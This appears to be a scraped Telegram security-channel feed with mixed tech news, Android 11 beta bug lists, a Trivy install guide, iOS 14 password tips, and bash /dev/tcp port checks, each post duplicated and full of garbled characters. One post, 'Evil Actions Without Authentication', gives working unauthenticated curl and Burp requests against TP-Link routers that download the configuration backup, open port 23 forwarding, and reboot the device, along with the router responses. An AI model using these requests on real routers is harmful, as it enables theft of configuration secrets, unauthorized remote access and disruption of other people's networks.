Forwarded from UNDERCODE NEWS
CAB-J renewed pay TV contact rate survey in April next year, expanding survey area nationwide.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top problems with Android 11 Beta and should you install it :
1) Google Pay doesn't work
The current version of Android 11 is not fully compatible with SafetyNet. Among other things, this means no access to Google Pay. You can run this application, but you cannot set a credit card there. Everything looks fine at first, but then the message "Unable to complete installation for payment in stores" appears.
2) New power menu is worse without Google Home
Many praise the power menu in Android 11. There are switches for controlling home appliances. If you don't use the Google Home app or don't have smart appliances, the menu gets worse.
a)You cannot click on an empty space to close the menu, you must use the back gesture.
b)The Restart and Shutdown buttons are at the very top and are difficult to reach due to the empty space where the buttons for household appliances could be.
c)The Lock button is hidden behind another menu to make room for fixture buttons you don't have.
d)The menu supports smart home applications, but applications do not yet support this menu.
3) Custom launchers can be reset
This bug will be fixed in future beta versions, but now the system periodically returns to the Pixel Launcher on its own instead of the launcher you installed. Usually, the screen turns off and on, after which your launcher returns.
4) The shape of the new icons does not fit the new context document
If you are using icons with new shapes from the Styles and Wallpapers section, they interfere with another cool new feature. If you define a new contextual dock when you apply a theme with one of five new icon shapes (pebble, beveled rectangle, vessel, hexagon, and flower), the responsive dock icons will revert to static versions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top problems with Android 11 Beta and should you install it :
1) Google Pay doesn't work
The current version of Android 11 is not fully compatible with SafetyNet. Among other things, this means no access to Google Pay. You can run this application, but you cannot set a credit card there. Everything looks fine at first, but then the message "Unable to complete installation for payment in stores" appears.
2) New power menu is worse without Google Home
Many praise the power menu in Android 11. There are switches for controlling home appliances. If you don't use the Google Home app or don't have smart appliances, the menu gets worse.
a)You cannot click on an empty space to close the menu, you must use the back gesture.
b)The Restart and Shutdown buttons are at the very top and are difficult to reach due to the empty space where the buttons for household appliances could be.
c)The Lock button is hidden behind another menu to make room for fixture buttons you don't have.
d)The menu supports smart home applications, but applications do not yet support this menu.
3) Custom launchers can be reset
This bug will be fixed in future beta versions, but now the system periodically returns to the Pixel Launcher on its own instead of the launcher you installed. Usually, the screen turns off and on, after which your launcher returns.
4) The shape of the new icons does not fit the new context document
If you are using icons with new shapes from the Styles and Wallpapers section, they interfere with another cool new feature. If you define a new contextual dock when you apply a theme with one of five new icon shapes (pebble, beveled rectangle, vessel, hexagon, and flower), the responsive dock icons will revert to static versions.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Evil Actions Without Authentication example : also in tp link routers :
A) Burp Request and curl command for conf.bin or backup file
=================
####### Burp ########
GET /cgi/conf.bin HTTP/1.1
Host: 192.168.0.1
User-Agent: Agent22
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/mainFrame.htm
Connection: close
Upgrade-Insecure-Requests: 1
-------Response--------
HTTP/1.1 200 OK
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 5720
Connection: close
w@\ΓΓb ΓͺLΓ½ΒͺΓ―Γβ‘ΓEβΉΓ»aΓΒ¬,*-Γ h[ΓβΉΒ³lΓβ¬ΓΓ.Β©-
.....SKIP.......
8/οΏ½οΏ½οΏ½οΏ½W
######## Curl ##########
curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent:
Agent22' -H $'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H
$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H
$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $'
http://192.168.0.1/cgi/conf.bin' > backup.bin
------ take a look in backup.bin file --------
===========================================
=========== Add Port Forwarding ============
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP
or UDP\x0d\x0aopenProtocol=TCP or
UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[1,1,2,7,0,0]0
triggerPort=23
triggerProtocol=TCP or UDP
openProtocol=TCP or UDP
enable=1
openPort=23
[error]0
----- Decription -----
enable=0 is for disable
enable=1 is for enable
u can change port also.
====================================
=========== Reboot Router =========================
curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent:
Mozilla/Agent22" -H 'Accept: */*' -H "Referer:
http://192.168.0.1/mainFrame.htm" --data-binary
$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
[error]0
----Description -----
error = 0 means reboot seccessully
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trivy another good linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan will complete within 10 seconds (depending on your network). Follow-up scan will complete in seconds
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including: container image, local file system, remote git repository.
Easy installation - it is possible to install apt-get, yum install and brew without prerequisites such as installing the database, libraries, etc.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Trivy another good linux tool
Discovery of complex vulnerabilities
Simplicity - Specify only the name of the image or the name of the artifact.
Fast - The first scan will complete within 10 seconds (depending on your network). Follow-up scan will complete in seconds
DevSecOps - Suitable for CIs like Travis CI, CircleCI, Jenkins, GitLab CI, etc.
Support for multiple formats - including: container image, local file system, remote git repository.
Easy installation - it is possible to install apt-get, yum install and brew without prerequisites such as installing the database, libraries, etc.
How to use the Trivy image scanner
Trivy can be installed on a number of Linux distributions as well as macOS.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) sudo apt-get install wget apt-transport-https gnupg lsb-release
2) wget -qO - https://aquasecurity.github.io/trivy-repo/deb/public.key | sudo apt-key add -
echo deb https://aquasecurity.github.io/trivy-repo/deb $(lsb_release -sc) main | sudo tee /etc/apt/sources.list.d/trivy.list
3) After adding the Trivy repository, update the server and install the trivy package as follows:
4) sudo apt-get update
5) sudo apt-get install trivy
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Iβm amazed at the Xbox Series X, which is full of contents, usually a power supply unit with a βdesign you want to avoidβ
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to know if a remote port is open using network forwarding:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22 / TCP is open at 127.0.0.1.
$ PROTO = "tcp"; DST_ADDR = "127.0.0.1"; DST_PORT = 22; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
B) Port 22 / TCP on 127.0.0.1 is OPEN
It's open, so let's see a TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10 + deb10u2
Find out if port 53 / UDP is open on 10.0.0.1.
$ PROTO = "udp"; DST_ADDR = "10.1.0.1"; DST_PORT = 53; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
Port 53 / UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π§ How to know if a remote port is open using network forwarding:
A) Find out if a remote port is open using network redirection with bash!
Check if port 22 / TCP is open at 127.0.0.1.
$ PROTO = "tcp"; DST_ADDR = "127.0.0.1"; DST_PORT = 22; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
B) Port 22 / TCP on 127.0.0.1 is OPEN
It's open, so let's see a TCP socket using bash again:
$ timeout 1 cat </dev/tcp/127.0.0.1/22
SSH-2.0-OpenSSH_7.9p1 Debian-10 + deb10u2
Find out if port 53 / UDP is open on 10.0.0.1.
$ PROTO = "udp"; DST_ADDR = "10.1.0.1"; DST_PORT = 53; (</ dev / $ {PROTO} / $ {DST_ADDR} / $ {DST_PORT} && STATUS = "OPEN" || STATUS = "CLOSED OR UNAVAILABLE "; echo Port $ {DST_PORT} / $ {PROTO ^^} on $ {DST_ADDR} is $ {STATUS}) 2> / dev / null
Port 53 / UDP on 10.1.0.1 is CLOSED OR UNAVAILABLE
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦security tip for ios 14
How Password Tracking to Protect Against Hacks Works in iOS 14:
1) Most people live online these days, so they have hundreds of logins and passwords for accounts on different sites and services. In such a case, a password manager is a vital necessity. IPhones have a built-in manager. In iOS 14, it has become even more useful, as it regularly checks to see if your passwords have appeared in data leaks on the Internet.
Apple's iCloud Keychain password manager has previously been able to warn about weak passwords and the fact that they are reused in different accounts. Previously, there was no check for matching passwords with cracked ones.
2) If a password is found in a data breach, this does not mean that your account has been compromised. The password leak could have happened from another site or by stealing data from the company as a whole, not necessarily on the exact site you are using. Despite this, even if you have complex passwords, hackers regularly add passwords that hit the network to brute force lists. It is only a matter of time before you become a target and your account can be hacked.
3) Monitoring passwords in Safari
If i.Cloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you of cracked passwords when you visit the site. If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, after logging in, the browser will warn you about the need to change the password on the site:
βThis password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately. "
βThe iPhone can create a complex password for you. Do you want to change the password for [site name] "?
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦security tip for ios 14
How Password Tracking to Protect Against Hacks Works in iOS 14:
1) Most people live online these days, so they have hundreds of logins and passwords for accounts on different sites and services. In such a case, a password manager is a vital necessity. IPhones have a built-in manager. In iOS 14, it has become even more useful, as it regularly checks to see if your passwords have appeared in data leaks on the Internet.
Apple's iCloud Keychain password manager has previously been able to warn about weak passwords and the fact that they are reused in different accounts. Previously, there was no check for matching passwords with cracked ones.
2) If a password is found in a data breach, this does not mean that your account has been compromised. The password leak could have happened from another site or by stealing data from the company as a whole, not necessarily on the exact site you are using. Despite this, even if you have complex passwords, hackers regularly add passwords that hit the network to brute force lists. It is only a matter of time before you become a target and your account can be hacked.
3) Monitoring passwords in Safari
If i.Cloud Keychain is configured to automatically enter passwords in mobile apps and web apps, Safari will alert you of cracked passwords when you visit the site. If you use iCloud Keychain to automatically enter logins and passwords on sites in this browser, after logging in, the browser will warn you about the need to change the password on the site:
βThis password appeared in a data breach, which increases the risk of this account being compromised. You must change your password immediately. "
βThe iPhone can create a complex password for you. Do you want to change the password for [site name] "?
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Nvidia responds to serious shortage of RTX3070/3080: temporarily unable to do anything.
#international
#international
